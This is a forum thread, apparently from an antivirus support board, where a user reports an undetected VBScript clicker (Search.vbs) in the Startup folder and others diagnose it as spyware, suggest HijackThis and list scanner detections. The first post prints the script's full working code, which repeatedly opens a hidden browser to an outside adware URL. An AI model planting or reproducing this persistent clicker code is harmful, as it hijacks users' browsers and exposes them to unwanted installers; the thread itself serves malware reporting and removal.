New virus - undetected

There is a malware on the Web that avast doesn’t detect yet.

Information:

  • Periodically a browser window opens on the address http://vbs.searchwww.com/vbs.cgi

  • The culprit is a file named Search.vbs that is installed in the All Users’ start menu group (\Documents and Settings\All Users\Start Menu\Startup)

  • The file contents is:
    while 1
    wscript.sleep 3600000
    set search = createobject(“internetexplorer.application”)
    search.height = 0
    search.menubar = 0
    search.statusbar = 0
    search.toolbar = 0
    search.width = 0
    search.navigate “http://vbs.searchwww.com/vbs.cgi
    do while search.busy
    wscript.sleep 1000
    loop
    if search.height = 0 and search.width = 0 then
    search.quit
    else
    search.visible = 1
    end if
    wend

Hi facorreia, welcome to the forums.

This appears to be a browser hijack, rather than a virus and as such won’t be dected as a virus. It is difficult to suggest a solution without information.

You don’t mention what effects this has had, download ads, redirect to various adult related sites, etc. The more information you can provide the more likely we are to be able to help.

Also as from the url (vbs.search, etc.) it would appear to be a Visual Basic script? and if so is script blocking is not a feature of the free avast home version. If you require script blocking this is available in the Pro version.

Do you have any anti adware/spyware softhare installed (look at my sig below fr some), do you have the hijackthis program? if so have you run it? what were the results (paste them here or check out, Eddy’s HiJackThis Info and Analysis page, HijackThis log file analyzer and follow the directions there and get back to us if you need more help…

Its not a virus. Its spyware.
I have run the URL over at my Virtual Machine and i got the GAIN/Precision Time Advertisement installer popup along with other normal popups.

I stand corrected, it is not a virus.

But it is a malware, and I think any system security software should block all kind of malwares, despite their form of propagation.

Other tools already do:

Jotti’s malware scan 2.41

AntiVir TR/Click.Krepper (2.48 seconds taken)
Avast No viruses found (7.78 seconds taken)
BitDefender Trojan.Clicker.VBS.Krepper (5.72 seconds taken)
ClamAV Trojan.Krepper.A (14.99 seconds taken)
Dr.Web No viruses found (8.81 seconds taken)
F-Prot Antivirus No viruses found (0.81 seconds taken)
F-Secure Anti-Virus TrojanClicker.VBS.Krepper (8.73 seconds taken)
Kaspersky Anti-Virus TrojanClicker.VBS.Krepper (8.63 seconds taken)
mks_vir VBS.Krepper.A (7.92 seconds taken)
NOD32 No viruses found (6.20 seconds taken)
Norman Virus Control No viruses found (2.87 seconds taken)

If you allready have this one, than there is probably more malware! You should post a Hijackthis log, so someone here could take a look at it.
How to do it? www.hjt.klaffke.de/en

Thanks!